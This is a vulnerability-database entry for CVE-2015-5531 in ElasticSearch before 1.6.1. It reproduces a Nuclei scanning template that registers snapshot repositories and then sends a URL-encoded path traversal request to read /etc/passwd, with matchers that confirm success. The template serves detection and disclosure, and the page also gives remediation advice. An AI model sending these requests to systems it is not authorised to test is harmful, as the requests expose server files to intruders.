ElasticSearch <1.6.1 - Local File Inclusion

2022-01-0411:21:00

ProjectDiscovery

github.com

6.3 Medium

AI Score

Confidence

Low

5 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

0.971 High

EPSS

Percentile

99.8%

JSON

ElasticSearch before 1.6.1 allows remote attackers to read arbitrary files via unspecified vectors related to snapshot API calls.

id: CVE-2015-5531

info:
  name: ElasticSearch <1.6.1 - Local File Inclusion
  author: princechaddha
  severity: medium
  description: ElasticSearch before 1.6.1 allows remote attackers to read arbitrary files via unspecified vectors related to snapshot API calls.
  impact: |
    Successful exploitation of this vulnerability allows an attacker to read arbitrary files on the server, potentially leading to unauthorized access or sensitive information disclosure.
  remediation: |
    Upgrade ElasticSearch to version 1.6.1 or later to mitigate the vulnerability.
  reference:
    - https://github.com/vulhub/vulhub/tree/master/elasticsearch/CVE-2015-5531
    - https://nvd.nist.gov/vuln/detail/CVE-2015-5531
    - http://packetstormsecurity.com/files/132721/Elasticsearch-Directory-Traversal.html
    - https://www.elastic.co/community/security/
    - http://packetstormsecurity.com/files/133797/ElasticSearch-Path-Traversal-Arbitrary-File-Download.html
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
    cvss-score: 5
    cve-id: CVE-2015-5531
    cwe-id: CWE-22
    epss-score: 0.97144
    epss-percentile: 0.99783
    cpe: cpe:2.3:a:elasticsearch:elasticsearch:*:*:*:*:*:*:*:*
  metadata:
    max-request: 3
    vendor: elasticsearch
    product: elasticsearch
  tags: cve2015,cve,vulhub,packetstorm,elasticsearch,intrusive

http:
  - raw:
      - |
        PUT /_snapshot/test HTTP/1.1
        Host: {{Hostname}}

        {
            "type": "fs",
            "settings": {
                "location": "/usr/share/elasticsearch/repo/test"
            }
        }
      - |
        PUT /_snapshot/test2 HTTP/1.1
        Host: {{Hostname}}

        {
            "type": "fs",
            "settings": {
                "location": "/usr/share/elasticsearch/repo/test/snapshot-backdata"
            }
        }
      - |
        GET /_snapshot/test/backdata%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd  HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - ElasticsearchParseException
          - Failed to derive xcontent from
          - 114, 111, 111, 116, 58
        condition: and

      - type: status
        status:
          - 400
# digest: 490a0046304402207c1a1828c260cd9afadd9844c9419a43cc0071d0c854a31ad8e4b6fabcb4d3720220461e43e06c10d317f6b91bfe48ee71c3848bd2d8dcb41ea01f454d3f3281c01a:922c64590222798bb761d5b6d8e72950